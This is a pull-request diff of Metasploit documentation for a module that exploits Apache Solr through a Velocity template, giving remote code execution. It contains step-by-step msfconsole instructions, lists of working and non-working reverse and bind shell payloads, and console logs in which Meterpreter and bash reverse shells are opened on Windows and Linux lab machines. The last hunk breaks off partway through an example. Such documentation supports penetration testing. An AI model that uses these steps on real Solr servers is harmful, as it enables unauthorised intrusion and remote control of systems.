### PR TITLE
Apache Solr Remote Code Execution via Velocity Template

### DIFF
--- a/documentation/modules/exploit/multi/http/solr_velocity_rce.md
+++ b/documentation/modules/exploit/multi/http/solr_velocity_rce.md
@@ -1,37 +1,21 @@
-## Introduction
+## Description
+This module exploits a vulnerability in Apache Solr <= 8.3.1 which allows remote code execution via a custom
+Velocity template. Currently, this module only supports Solr basic authentication.
 
 **From the Tenable advisory**:
-...an attacker could target a vulnerable Apache Solr instance by first identifying a list of Solr core names.
-Once the core names have been identified, an attacker can send a specially crafted HTTP POST request to the Config API to toggle the params resource loader value for the Velocity Response Writer in the solrconfig.xml file to true.
-Enabling this parameter would allow an attacker to use the velocity template parameter in a specially crafted Solr request, leading to RCE.
-Currently, this vulnerability does not have a CVE assigned to it.
+An attacker could target a vulnerable Apache Solr instance by first identifying a list
+of Solr core names. Once the core names have been identified, an attacker can send a specially crafted
+HTTP POST request to the Config API to toggle the params resource loader value for the Velocity Response
+Writer in the solrconfig.xml file to true. Enabling this parameter would allow an attacker to use the Velocity
+template parameter in a specially crafted Solr request, leading to RCE.
 
-**Overview**
-This module will carry out the following tasks in order during `check`:
-
-1. Check if authentication is required.
-2. If authentication is required and credentials are provided, attempt to authenticate using provided credentials. If successful, store creds and use them in subsequent requests.
-3. Check victim's OS
-4. Enumerate Solr cores
-5. Check configuration of each Solr core to determine if `params.resource.loader.enabled` is `true`
-
-And during `exploit`:
-
-1. Run `check` to see if victim is vulnerable
-2. Attempt to change `params.resource.loader.enabled` to `true` if it isn't already set to `true`
-3. Check if selected target and OS of victim match. Abort if it doesn't match, continue if it does.
-4. If victim's OS platform is `Windows` check for PowerShell. Abort if `PowerShell` is not present, continue if it is.
-5. If victim's OS platform is `Unix` check for Bash. Abort if `Bash` is not present, continue if it is
-6. Generate payload and place inside custom template
-7. Exploit and gain access
-
-Privileges gained are dependent on the user running Solr.
-Currently, this module only supports basic auth.
-Payload defaults to `windows/meterpreter/reverse_tcp` for Windows and `cmd/unix/reverse_bash` for Unix.
+Payload defaults to x86 Meterpreter reverse TCP (`windows/meterpreter/reverse_tcp`) for Windows,
+Bash reverse TCP shell (`cmd/unix/reverse_bash`) for Unix in-memory execution, and
+x86 Meterpreter reverse TCP (`linux/x86/meterpreter/reverse_tcp`) for Linux command stager.
 
 ## Vulnerable Applications
 
-- Apache Solr <= 8.3.0
+Apache Solr <= 8.3.0
 
 ## Verification Steps
 
@@ -50,38 +34,101 @@ Payload defaults to `windows/meterpreter/reverse_tcp` for Windows and `cmd/unix/
 13. Optional: `set TARGETURI <path_to_solr>` if target system uses a different path to Apache Solr
 14. `exploit` and let the shells rain
 
+## Considerations
+
+Privileges gained are dependent on the user running Solr.
+Currently, this module only supports basic auth.
+Payload defaults to `windows/meterpreter/reverse_tcp` for Windows (for both `PowerShell` and `CmdStager`)
+*nix systems have 2 targets:
+1. Unix: Uses command execution. Payload defaults to `cmd/unix/reverse_bash`
+2. Linux: Uses `CmdStager`. Payload defaults to `linux/x86/meterpreter/reverse_tcp`
+
+Some `cmd/unix` payloads do not work due to a quoting problem: the entire command in the Velocity template is single-quoted
+for the convenience of `CmdStager`. Some `cmd/unix` payloads as they are single-quoted, so this breaks the Velocity template.
+
+The full list of `cmd/unix` payloads that do not work due to the quoting problem are listed below:
+1. cmd/unix/bind_awk
+2. cmd/unix/bind_lua
+3. cmd/unix/bind_nodejs
+4. cmd/unix/bind_r
+5. cmd/unix/bind_ruby
+6. cmd/unix/bind_socat_udp
+7. cmd/unix/reverse_awk
+8. cmd/unix/reverse_lua
+9. cmd/unix/reverse_nodejs
+10. cmd/unix/reverse_perl
+11. cmd/unix/reverse_perl_ssl
+12. cmd/unix/reverse_php_ssl
+13. cmd/unix/reverse_python
+14. cmd/unix/reverse_python_ssl
+15. cmd/unix/reverse_r
+16. cmd/unix/reverse_ruby
+17. cmd/unix/reverse_ruby_ssl
+18. cmd/unix/reverse_socat_udp
+29. generic/shell_bind_tcp
+20. generic/shell_reverse_tcp
+
+The full list of `cmd/unix` payloads that work:
+1. cmd/unix/bind_netcat
+2. cmd/unix/bind_netcat_gaping
+3. cmd/unix/bind_perl
+4. cmd/unix/bind_zsh
+5. cmd/unix/generic
+6. cmd/unix/pingback_bind
+7. cmd/unix/pingback_reverse
+8. cmd/unix/reverse
+9. cmd/unix/reverse_bash
+10. cmd/unix/reverse_bash_udp
+11. cmd/unix/reverse_ksh
+12. cmd/unix/reverse_openssl
+13. cmd/unix/reverse_ncat_ssl
+14. cmd/unix/reverse_netcat
+15. cmd/unix/reverse_netcat_gaping
+16. cmd/unix/reverse_zsh
+
+These `cmd/unix` payloads have not fully tested with this module:
+1. cmd/unix/bind_busybox_telnetd
+3. cmd/unix/bind_netcat_gaping_ipv6
+3. cmd/unix/bind_perl_ipv6
+4. cmd/unix/bind_ruby_ipv6
+5. cmd/unix/reverse_bash_telnet_ssl
+6. cmd/unix/reverse_ssl_double_telnet
+
+These `cmd/unix` payloads have not been tested:
+1. cmd/unix/bind_stub
+2. cmd/unix/reverse_stub
+3. generic/custom
+
 
 ## Examples
 
-### Windows Server 2019 Datacenter, fully patched, Solr 8.3.0, no authentication
+### Windows Server 2019 Datacenter, fully patched, Solr 8.3.0, no authentication, using PowerShell
 ```
 msf5 > use exploit/multi/http/solr_velocity_rce
-msf5 exploit(multi/http/solr_velocity_rce) > set RHOSTS 172.16.252.129
-RHOSTS => 172.16.252.129
+msf5 exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.132
+RHOSTS => 192.168.137.132
+msf5 exploit(multi/http/solr_velocity_rce) > set LHOST 192.168.137.128
+LHOST => 192.168.137.128
+msf5 exploit(multi/http/solr_velocity_rce) > set LPORT 4444
+LPORT => 4444
 msf5 exploit(multi/http/solr_velocity_rce) > check
 
 [*] Found Apache Solr 8.3.0
 [*] OS version is Windows Server 2019 amd64 10.0
 [*] Found core(s): techproducts
-[!] params.resource.loader.enabled for core techproducts is set to false.
-[+] 172.16.252.129:8983 - The target is vulnerable.
-msf5 exploit(multi/http/solr_velocity_rce) > set TARGET 1
-TARGET => 1
-msf5 exploit(multi/http/solr_velocity_rce) > set LHOST 172.16.252.1
-LHOST => 172.16.252.1
+[+] 192.168.137.132:8983 - The target is vulnerable.
+msf5 exploit(multi/http/solr_velocity_rce) > set TARGET 2
+TARGET => 2
 msf5 exploit(multi/http/solr_velocity_rce) > exploit
 
-[*] Started reverse TCP handler on 172.16.252.1:4444
+[*] Started reverse TCP handler on 192.168.137.128:4444 
 [*] Found Apache Solr 8.3.0
 [*] OS version is Windows Server 2019 amd64 10.0
 [*] Found core(s): techproducts
-[!] params.resource.loader.enabled for core techproducts is set to false.
 [*] Targeting core 'techproducts'
-[*] params.resource.loader.enabled is false, setting it to true...
-[+] params.resource.loader.enabled is now set to true!
-[+] PowerShell found, good to go!
-[*] Sending stage (180291 bytes) to 172.16.252.129
-[*] Meterpreter session 1 opened (172.16.252.1:4444 -> 172.16.252.129:50891) at 2019-12-29 11:49:39 +0800
+[+] Found Powershell at C:\Windows\System32\WindowsPowerShell\v1.0\
+[*] Sending stage (180291 bytes) to 192.168.137.132
+[*] Meterpreter session 1 opened (192.168.137.128:4444 -> 192.168.137.132:50100) at 2020-02-07 01:28:08 +0800
 
 meterpreter > sysinfo
 Computer        : 2K19DTCTR
@@ -91,82 +138,129 @@ System Language : en_US
 Domain          : WORKGROUP
 Logged On Users : 1
 Meterpreter     : x86/windows
-meterpreter > getuid
-Server username: 2K19DTCTR\Administrator
-meterpreter >
+meterpreter > 
 ```
 
-### Bitnami Solr VM 8.3.0, requiring basic authentication
+### Windows Server 2019 Datacenter, fully patched, Solr 8.3.0, no authentication, using CmdStager
 ```
-msf5 > use exploit/multi/http/solr_velocity_rce
-msf5 exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.35.130
-RHOSTS => 192.168.35.130
+msf5 > use exploit/multi/http/solr_velocity_rce 
+msf5 exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.132
+RHOSTS => 192.168.137.132
+msf5 exploit(multi/http/solr_velocity_rce) > set LHOST 192.168.137.128
+LHOST => 192.168.137.128
+msf5 exploit(multi/http/solr_velocity_rce) > set LPORT 4444
+LPORT => 4444
+msf5 exploit(multi/http/solr_velocity_rce) > set TARGET 2
+TARGET => 2
+msf5 exploit(multi/http/solr_velocity_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.137.128:4444 
+[*] Found Apache Solr 8.3.0
+[*] OS version is Windows Server 2019 amd64 10.0
+[*] Found core(s): techproducts
+[*] Targeting core 'techproducts'
+[!] PowerShell not found, will revert to CmdStager for payload delivery!
+[*] Sending CmdStager payload...
+[*] Command Stager progress -   7.05% done (7160/101541 bytes)
+[*] Command Stager progress -  14.10% done (14320/101541 bytes)
+[*] Command Stager progress -  21.15% done (21480/101541 bytes)
+[*] Command Stager progress -  28.21% done (28640/101541 bytes)
+[*] Command Stager progress -  35.26% done (35800/101541 bytes)
+[*] Command Stager progress -  42.31% done (42960/101541 bytes)
+[*] Command Stager progress -  49.36% done (50120/101541 bytes)
+[*] Command Stager progress -  56.41% done (57280/101541 bytes)
+[*] Command Stager progress -  63.46% done (64440/101541 bytes)
+[*] Command Stager progress -  70.51% done (71600/101541 bytes)
+[*] Command Stager progress -  77.56% done (78760/101541 bytes)
+[*] Command Stager progress -  84.62% done (85920/101541 bytes)
+[*] Command Stager progress -  91.67% done (93080/101541 bytes)
+[*] Command Stager progress -  98.67% done (100188/101541 bytes)
+[*] Sending stage (180291 bytes) to 192.168.137.132
+[*] Command Stager progress - 100.00% done (101541/101541 bytes)
+[*] Meterpreter session 2 opened (192.168.137.128:4444 -> 192.168.137.132:50209) at 2020-02-07 16:01:44 +0800
+
+meterpreter > sysinfo
+Computer        : 2K19DTCTR
+OS              : Windows 2016+ (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x86/windows
+meterpreter > 
+
+
+```
+
+### Bitnami Solr VM 8.3.0, requiring basic authentication, command execution in-memory (example payload is cmd/unix/reverse_bash)
+```
+msf5 > use exploit/multi/http/solr_velocity_rce 
+msf5 exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.129
+RHOSTS => 192.168.137.129
 msf5 exploit(multi/http/solr_velocity_rce) > set RPORT 80
 RPORT => 80
-msf5 exploit(multi/http/solr_velocity_rce) > check
-
-[!] Authentication required for 192.168.35.130:80!
-[*] Attempting authentication for 192.168.35.130:80...
-[*] 192.168.35.130:80 - Cannot reliably check exploitability. Authentication failed!
+msf5 exploit(multi/http/solr_velocity_rce) > set TARGET 0
+TARGET => 0
 msf5 exploit(multi/http/solr_velocity_rce) > set USERNAME user
 USERNAME => user
 msf5 exploit(multi/http/solr_velocity_rce) > set PASSWORD j6lzH82e6Jc5
 PASSWORD => j6lzH82e6Jc5
-msf5 exploit(multi/http/solr_velocity_rce) > check
-
-[!] Authentication required for 192.168.35.130:80!
-[*] Attempting authentication for 192.168.35.130:80...
-[+] Authentication succeeded!
-[*] Found Apache Solr 8.3.0
-[*] OS version is Linux amd64 4.9.0-11-amd64
-[*] Found core(s): techproducts
-[+] 192.168.35.130:80 - The target is vulnerable.
-msf5 exploit(multi/http/solr_velocity_rce) > set TARGET 0
-TARGET => 0
-msf5 exploit(multi/http/solr_velocity_rce) > set LHOST 192.168.35.1
-LHOST => 192.168.35.1
+msf5 exploit(multi/http/solr_velocity_rce) > set LHOST 192.168.137.128
+LHOST => 192.168.137.128
+msf5 exploit(multi/http/solr_velocity_rce) > set LPORT 4444
+LPORT => 4444
 msf5 exploit(multi/http/solr_velocity_rce) > exploit
 
-[*] Started reverse TCP handler on 192.168.35.1:4444
+[*] Started reverse TCP handler on 192.168.137.128:4444 
 [*] Found Apache Solr 8.3.0
 [*] OS version is Linux amd64 4.9.0-11-amd64
 [*] Found core(s): techproducts
 [*] Targeting core 'techproducts'
-[+] Bash found, good to go!
-[*] Command shell session 2 opened (192.168.35.1:4444 -> 192.168.35.130:59956) at 2019-12-29 11:51:52 +0800
+[*] Command shell session 3 opened (192.168.137.128:4444 -> 192.168.137.129:48680) at 2020-02-07 16:04:29 +0800
 
-uname -a
-Linux debian 4.9.0-11-amd64 #1 SMP Debian 4.9.189-3+deb9u1 (2019-09-20) x86_64 GNU/Linux
 id
 uid=999(solr) gid=1002(solr) groups=1002(solr)
 
 ```
 
-### Docker Solr 8.2.0, no authentication
+### Bitnami Solr VM 8.3.0, requiring basic authentication, using CmdStager
 ```
-msf5 > use exploit/multi/http/solr_velocity_rce
-msf5 exploit(multi/http/solr_velocity_rce) > set RHOSTS 172.17.0.2
-RHOSTS => 172.17.0.2
-msf5 exploit(multi/http/solr_velocity_rce) > check
-
-[*] Found Apache Solr 8.2.0
-[*] OS version is Linux amd64 5.3.0-kali3-amd64
-[*] Found core(s): gettingstarted, techproducts
-[+] 172.17.0.2:8983 - The target is vulnerable.
-msf5 exploit(multi/http/solr_velocity_rce) > set LHOST 172.17.0.1
-LHOST => 172.17.0.1
+msf5 > use exploit/multi/http/solr_velocity_rce 
+msf5 exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.129
+RHOSTS => 192.168.137.129
+msf5 exploit(multi/http/solr_velocity_rce) > set RPORT 80
+RPORT => 80
+msf5 exploit(multi/http/solr_velocity_rce) > set USERNAME user
+USERNAME => user
+msf5 exploit(multi/http/solr_velocity_rce) > set PASSWORD j6lzH82e6Jc5
+PASSWORD => j6lzH82e6Jc5
+msf5 exploit(multi/http/solr_velocity_rce) > set TARGET 1
+TARGET => 1
+msf5 exploit(multi/http/solr_velocity_rce) > set LHOST 192.168.137.128
+LHOST => 192.168.137.128
+msf5 exploit(multi/http/solr_velocity_rce) > set LPORT 4444
+LPORT => 4444
 msf5 exploit(multi/http/solr_velocity_rce) > exploit
 
-[*] Started reverse TCP handler on 172.17.0.1:4444
-[*] Found Apache Solr 8.2.0
-[*] OS version is Linux amd64 5.3.0-kali3-amd64
-[*] Found core(s): gettingstarted, techproducts
-[*] Targeting core 'gettingstarted'
-[+] Bash found, good to go!
-[*] Command shell session 3 opened (172.17.0.1:4444 -> 172.17.0.2:59340) at 2019-12-29 11:55:32 +0800
+[*] Started reverse TCP handler on 192.168.137.128:4444 
+[*] Found Apache Solr 8.3.0
+[*] OS version is Linux amd64 4.9.0-11-amd64
+[*] Found core(s): techproducts
+[*] Targeting core 'techproducts'
+[*] Using URL: http://0.0.0.0:8080/L9Iefj
+[*] Local IP: http://192.168.137.128:8080/L9Iefj
+[*] Client 192.168.137.129 (curl/7.52.1) requested /L9Iefj
+[*] Sending payload to 192.168.137.129 (curl/7.52.1)
+[*] Sending stage (985320 bytes) to 192.168.137.129
+[*] Meterpreter session 4 opened (192.168.137.128:4444 -> 192.168.137.129:48694) at 2020-02-07 16:07:41 +0800
+[*] Command Stager progress - 100.00% done (147/147 bytes)
+[*] Server stopped.
 
-uname -a
-Linux 2667812695e4 5.3.0-kali3-amd64 #1 SMP Debian 5.3.15-1kali1 (2019-12-09) x86_64 GNU/Linux
-id
-uid=8983(solr) gid=8983(solr) groups=8983(solr)
+meterpreter > sysinfo
+Computer     : 192.168.137.129
+OS           : Debian 9.11 (Linux 4.9.0-11-amd64)
+Architecture : x64
+BuildTuple   : i486-linux-musl
+Meterpreter  : x86/linux
+meterpreter > 
 ```

--- a/documentation/modules/exploit/multi/http/solr_velocity_rce.md
+++ b/documentation/modules/exploit/multi/http/solr_velocity_rce.md
@@ -1,0 +1,202 @@
+## Introduction
+
+**From the Tenable advisory**:
+...an attacker could target a vulnerable Apache Solr instance by first identifying a list of Solr core names.
+Once the core names have been identified, an attacker can send a specially crafted HTTP POST request to the Config API to toggle the params resource loader value for the Velocity Response Writer in the solrconfig.xml file to true.
+Enabling this parameter would allow an attacker to use the velocity template parameter in a specially crafted Solr request, leading to RCE.
+
+This module will carry out the following tasks in order during `check`:
+
+1. Check if authentication is required.
+2. If authentication is required and credentials are provided, attempt to authenticate using provided credentials. If successful, use the credentials in subsequent requests.
+3. Check victim's OS
+4. Enumerate Solr cores
+5. Check configuration of each Solr core to determine if `params.resource.loader.enabled` is `true`
+
+And during `exploit`:
+
+1. Run `check` to see if victim is vulnerable
+2. Attempt to change `params.resource.loader.enabled` to `true` if it isn't already set to `true`
+3. Check if selected target and OS of victim match. Abort if it doesn't match, continue if it does.
+4. If victim's OS platform is `Windows` check for PowerShell. Abort if `PowerShell` is not present, continue if it is.
+5. Generate payload and place inside custom template
+6. Exploit and gain access
+
+Privileges gained are dependent on the user running Solr.
+
+## Vulnerable Applications
+
+- Apache Solr <= 8.3.0
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. `use exploit/multi/http/solr_velocity_rce`
+3. `set RHOST <target_ip>`
+4. `set RPORT <target_port>`
+5. `set USERNAME <username>` (if applicable)
+6. `set PASSWORD <password>` (if applicable)
+7. Ideally run `check`
+8. `set TARGET` based on output of `check`
+9. `set PAYLOAD <payload_name>` if you want to use other payloads
+10. `set LHOST <your_ip>`
+11. `set LPORT <your_port>`
+12. `exploit` and let the shells rain
+
+## Options
+
+- No module-specific options used.
+
+## Examples
+
+### Windows Server 2019 Datacenter, fully patched, Solr 8.3.0, no authentication
+```
+msf5 > use exploit/multi/http/solr_velocity_rce
+msf5 exploit(multi/http/solr_velocity_rce) > set RHOSTS 172.16.252.129
+RHOSTS => 172.16.252.129
+msf5 exploit(multi/http/solr_velocity_rce) > check
+
+[*] Found Apache Solr 8.3.0
+[*] OS version is Windows Server 2019 amd64 10.0
+[+] Found core(s): techproducts
+[+] params.resource.loader.enabled for core 'techproducts' is set to true.
+[+] 172.16.252.129:8983 - The target is vulnerable.
+msf5 exploit(multi/http/solr_velocity_rce) > set TARGET x86/x64\ Windows
+TARGET => x86/x64 Windows
+msf5 exploit(multi/http/solr_velocity_rce) > set LHOST 172.16.252.1
+LHOST => 172.16.252.1
+msf5 exploit(multi/http/solr_velocity_rce) > exploit
+
+[*] Started reverse TCP handler on 172.16.252.1:4444
+[*] Found Apache Solr 8.3.0
+[*] OS version is Windows Server 2019 amd64 10.0
+[+] Found core(s): techproducts
+[+] params.resource.loader.enabled for core 'techproducts' is set to true.
+[*] Sending stage (180291 bytes) to 172.16.252.129
+[*] Meterpreter session 1 opened (172.16.252.1:4444 -> 172.16.252.129:50806) at 2019-12-26 20:06:57 +0800
+
+meterpreter > sysinfo
+Computer        : 2K19DTCTR
+OS              : Windows 2016+ (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x86/windows
+meterpreter > getuid
+Server username: 2K19DTCTR\Administrator
+meterpreter >
+```
+
+### Bitnami Solr VM 8.3.0, failed authentication
+```
+msf5 > use exploit/multi/http/solr_velocity_rce
+msf5 exploit(multi/http/solr_velocity_rce) > set RHOSTS 172.16.252.137
+RHOSTS => 172.16.252.137
+msf5 exploit(multi/http/solr_velocity_rce) > set RPORT 80
+RPORT => 80
+msf5 exploit(multi/http/solr_velocity_rce) > check
+
+[!] Authentication required for 172.16.252.137:80!
+[-] Credentials not provided, skipping credentialed check...
+[*] 172.16.252.137:80 - Cannot reliably check exploitability.
+msf5 exploit(multi/http/solr_velocity_rce) >
+```
+
+### Bitnami Solr VM 8.3.0, successful authentication
+```
+msf5 > use exploit/multi/http/solr_velocity_rce
+msf5 exploit(multi/http/solr_velocity_rce) > set RHOSTS 172.16.252.137
+RHOSTS => 172.16.252.137
+msf5 exploit(multi/http/solr_velocity_rce) > set RPORT 80
+RPORT => 80
+msf5 exploit(multi/http/solr_velocity_rce) > check
+msf5 exploit(multi/http/solr_velocity_rce) > set USERNAME user
+USERNAME => user
+msf5 exploit(multi/http/solr_velocity_rce) > set PASSWORD j6lzH82e6Jc5
+PASSWORD => j6lzH82e6Jc5
+msf5 exploit(multi/http/solr_velocity_rce) > check
+
+[!] Authentication required for 172.16.252.137:80!
+[*] Attempting authentication for 172.16.252.137:80...
+[*] Found Apache Solr 8.3.0
+[*] OS version is Linux amd64 4.9.0-11-amd64
+[+] Found core(s): techproducts
+[+] params.resource.loader.enabled for core 'techproducts' is set to true.
+[+] 172.16.252.137:80 - The target is vulnerable.
+msf5 exploit(multi/http/solr_velocity_rce) >
+```
+
+### Bitnami Solr VM 8.3.0, successful exploit
+```
+msf5 > use exploit/multi/http/solr_velocity_rce
+msf5 exploit(multi/http/solr_velocity_rce) > set RHOSTS 172.16.252.137
+RHOSTS => 172.16.252.137
+msf5 exploit(multi/http/solr_velocity_rce) > set RPORT 80
+RPORT => 80
+msf5 exploit(multi/http/solr_velocity_rce) > check
+msf5 exploit(multi/http/solr_velocity_rce) > set USERNAME user
+USERNAME => user
+msf5 exploit(multi/http/solr_velocity_rce) > set PASSWORD j6lzH82e6Jc5
+PASSWORD => j6lzH82e6Jc5
+msf5 exploit(multi/http/solr_velocity_rce) > check
+
+[!] Authentication required for 172.16.252.137:80!
+[*] Attempting authentication for 172.16.252.137:80...
+[*] Found Apache Solr 8.3.0
+[*] OS version is Linux amd64 4.9.0-11-amd64
+[+] Found core(s): techproducts
+[+] params.resource.loader.enabled for core 'techproducts' is set to true.
+[+] 172.16.252.137:80 - The target is vulnerable.
+msf5 exploit(multi/http/solr_velocity_rce) > set TARGET 1
+TARGET => 1
+msf5 exploit(multi/http/solr_velocity_rce) > exploit
+
+[*] Started reverse TCP handler on 172.17.0.1:4444
+[!] Authentication required for 172.16.252.137:80!
+[*] Attempting authentication for 172.16.252.137:80...
+[*] Found Apache Solr 8.3.0
+[*] OS version is Linux amd64 4.9.0-11-amd64
+[+] Found core(s): techproducts
+[+] params.resource.loader.enabled for core 'techproducts' is set to true.
+[*] Command shell session 3 opened (172.17.0.1:4444 -> 192.168.5.9:34805) at 2019-12-26 20:15:39 +0800
+
+uname -a
+Linux debian 4.9.0-11-amd64 #1 SMP Debian 4.9.189-3+deb9u1 (2019-09-20) x86_64 GNU/Linux
+whoami
+solr
+```
+
+
+### Docker Solr 8.2.0, no authentication
+```
+msf5 > use exploit/multi/http/solr_velocity_rce
+msf5 exploit(multi/http/solr_velocity_rce) > set RHOST 172.17.0.2
+RHOST => 172.17.0.2
+msf5 exploit(multi/http/solr_velocity_rce) > check
+
+[*] Found Apache Solr 8.2.0
+[*] OS version is Linux amd64 5.3.0-kali3-amd64
+[+] Found core(s): gettingstarted, techproducts
+[+] params.resource.loader.enabled for core 'gettingstarted' is set to true.
+[+] params.resource.loader.enabled for core 'techproducts' is set to true.
+[+] 172.17.0.2:8983 - The target is vulnerable.
+msf5 exploit(multi/http/solr_velocity_rce) > set TARGET 1
+TARGET => 1
+msf5 exploit(multi/http/solr_velocity_rce) > set LHOST 172.17.0.1
+LHOST => 172.17.0.1
+msf5 exploit(multi/http/solr_velocity_rce) > exploit
+
+[*] Started reverse TCP handler on 172.17.0.1:4444
+[*] Found Apache Solr 8.2.0
+[*] OS version is Linux amd64 5.3.0-kali3-amd64
+[+] Found core(s): gettingstarted, techproducts
+[+] params.resource.loader.enabled for core 'gettingstarted' is set to true.
+[*] Command shell session 1 opened (172.17.0.1:4444 -> 172.17.0.2:51036) at 2019-12-26 20:10:01 +0800
+
+uname -a
+Linux 2667812695e4 5.3.0-kali3-amd64 #1 SMP Debian 5.3.15-1kali1 (2019-12-09) x86_64 GNU/Linux
+whoami
+solr
+```
+

--- a/documentation/modules/exploit/multi/http/solr_velocity_rce.md
+++ b/documentation/modules/exploit/multi/http/solr_velocity_rce.md
@@ -4,11 +4,13 @@
 ...an attacker could target a vulnerable Apache Solr instance by first identifying a list of Solr core names.
 Once the core names have been identified, an attacker can send a specially crafted HTTP POST request to the Config API to toggle the params resource loader value for the Velocity Response Writer in the solrconfig.xml file to true.
 Enabling this parameter would allow an attacker to use the velocity template parameter in a specially crafted Solr request, leading to RCE.
+Currently, this vulnerability does not have a CVE assigned to it.
 
+**Overview**
 This module will carry out the following tasks in order during `check`:
 
 1. Check if authentication is required.
-2. If authentication is required and credentials are provided, attempt to authenticate using provided credentials. If successful, use the credentials in subsequent requests.
+2. If authentication is required and credentials are provided, attempt to authenticate using provided credentials. If successful, store creds and use them in subsequent requests.
 3. Check victim's OS
 4. Enumerate Solr cores
 5. Check configuration of each Solr core to determine if `params.resource.loader.enabled` is `true`
@@ -19,10 +21,13 @@ And during `exploit`:
 2. Attempt to change `params.resource.loader.enabled` to `true` if it isn't already set to `true`
 3. Check if selected target and OS of victim match. Abort if it doesn't match, continue if it does.
 4. If victim's OS platform is `Windows` check for PowerShell. Abort if `PowerShell` is not present, continue if it is.
-5. Generate payload and place inside custom template
-6. Exploit and gain access
+5. If victim's OS platform is `Unix` check for Bash. Abort if `Bash` is not present, continue if it is
+6. Generate payload and place inside custom template
+7. Exploit and gain access
 
 Privileges gained are dependent on the user running Solr.
+Currently, this module only supports basic auth.
+Payload defaults to `windows/meterpreter/reverse_tcp` for Windows and `cmd/unix/reverse_bash` for Unix.
 
 ## Vulnerable Applications
 
@@ -41,11 +46,10 @@ Privileges gained are dependent on the user running Solr.
 9. `set PAYLOAD <payload_name>` if you want to use other payloads
 10. `set LHOST <your_ip>`
 11. `set LPORT <your_port>`
-12. `exploit` and let the shells rain
+12. Optional: `set VERBOSE true` to get verbose output
+13. Optional: `set TARGETURI <path_to_solr>` if target system uses a different path to Apache Solr
+14. `exploit` and let the shells rain
 
-## Options
-
-- No module-specific options used.
 
 ## Examples
 
@@ -58,11 +62,11 @@ msf5 exploit(multi/http/solr_velocity_rce) > check
 
 [*] Found Apache Solr 8.3.0
 [*] OS version is Windows Server 2019 amd64 10.0
-[+] Found core(s): techproducts
-[+] params.resource.loader.enabled for core 'techproducts' is set to true.
+[*] Found core(s): techproducts
+[!] params.resource.loader.enabled for core techproducts is set to false.
 [+] 172.16.252.129:8983 - The target is vulnerable.
-msf5 exploit(multi/http/solr_velocity_rce) > set TARGET x86/x64\ Windows
-TARGET => x86/x64 Windows
+msf5 exploit(multi/http/solr_velocity_rce) > set TARGET 1
+TARGET => 1
 msf5 exploit(multi/http/solr_velocity_rce) > set LHOST 172.16.252.1
 LHOST => 172.16.252.1
 msf5 exploit(multi/http/solr_velocity_rce) > exploit
@@ -70,10 +74,14 @@ msf5 exploit(multi/http/solr_velocity_rce) > exploit
 [*] Started reverse TCP handler on 172.16.252.1:4444
 [*] Found Apache Solr 8.3.0
 [*] OS version is Windows Server 2019 amd64 10.0
-[+] Found core(s): techproducts
-[+] params.resource.loader.enabled for core 'techproducts' is set to true.
+[*] Found core(s): techproducts
+[!] params.resource.loader.enabled for core techproducts is set to false.
+[*] Targeting core 'techproducts'
+[*] params.resource.loader.enabled is false, setting it to true...
+[+] params.resource.loader.enabled is now set to true!
+[+] PowerShell found, good to go!
 [*] Sending stage (180291 bytes) to 172.16.252.129
-[*] Meterpreter session 1 opened (172.16.252.1:4444 -> 172.16.252.129:50806) at 2019-12-26 20:06:57 +0800
+[*] Meterpreter session 1 opened (172.16.252.1:4444 -> 172.16.252.129:50891) at 2019-12-29 11:49:39 +0800
 
 meterpreter > sysinfo
 Computer        : 2K19DTCTR
@@ -88,101 +96,63 @@ Server username: 2K19DTCTR\Administrator
 meterpreter >
 ```
 
-### Bitnami Solr VM 8.3.0, failed authentication
+### Bitnami Solr VM 8.3.0, requiring basic authentication
 ```
 msf5 > use exploit/multi/http/solr_velocity_rce
-msf5 exploit(multi/http/solr_velocity_rce) > set RHOSTS 172.16.252.137
-RHOSTS => 172.16.252.137
+msf5 exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.35.130
+RHOSTS => 192.168.35.130
 msf5 exploit(multi/http/solr_velocity_rce) > set RPORT 80
 RPORT => 80
 msf5 exploit(multi/http/solr_velocity_rce) > check
 
-[!] Authentication required for 172.16.252.137:80!
-[-] Credentials not provided, skipping credentialed check...
-[*] 172.16.252.137:80 - Cannot reliably check exploitability.
-msf5 exploit(multi/http/solr_velocity_rce) >
-```
-
-### Bitnami Solr VM 8.3.0, successful authentication
-```
-msf5 > use exploit/multi/http/solr_velocity_rce
-msf5 exploit(multi/http/solr_velocity_rce) > set RHOSTS 172.16.252.137
-RHOSTS => 172.16.252.137
-msf5 exploit(multi/http/solr_velocity_rce) > set RPORT 80
-RPORT => 80
-msf5 exploit(multi/http/solr_velocity_rce) > check
+[!] Authentication required for 192.168.35.130:80!
+[*] Attempting authentication for 192.168.35.130:80...
+[*] 192.168.35.130:80 - Cannot reliably check exploitability. Authentication failed!
 msf5 exploit(multi/http/solr_velocity_rce) > set USERNAME user
 USERNAME => user
 msf5 exploit(multi/http/solr_velocity_rce) > set PASSWORD j6lzH82e6Jc5
 PASSWORD => j6lzH82e6Jc5
 msf5 exploit(multi/http/solr_velocity_rce) > check
 
-[!] Authentication required for 172.16.252.137:80!
-[*] Attempting authentication for 172.16.252.137:80...
+[!] Authentication required for 192.168.35.130:80!
+[*] Attempting authentication for 192.168.35.130:80...
+[+] Authentication succeeded!
 [*] Found Apache Solr 8.3.0
 [*] OS version is Linux amd64 4.9.0-11-amd64
-[+] Found core(s): techproducts
-[+] params.resource.loader.enabled for core 'techproducts' is set to true.
-[+] 172.16.252.137:80 - The target is vulnerable.
-msf5 exploit(multi/http/solr_velocity_rce) >
-```
-
-### Bitnami Solr VM 8.3.0, successful exploit
-```
-msf5 > use exploit/multi/http/solr_velocity_rce
-msf5 exploit(multi/http/solr_velocity_rce) > set RHOSTS 172.16.252.137
-RHOSTS => 172.16.252.137
-msf5 exploit(multi/http/solr_velocity_rce) > set RPORT 80
-RPORT => 80
-msf5 exploit(multi/http/solr_velocity_rce) > check
-msf5 exploit(multi/http/solr_velocity_rce) > set USERNAME user
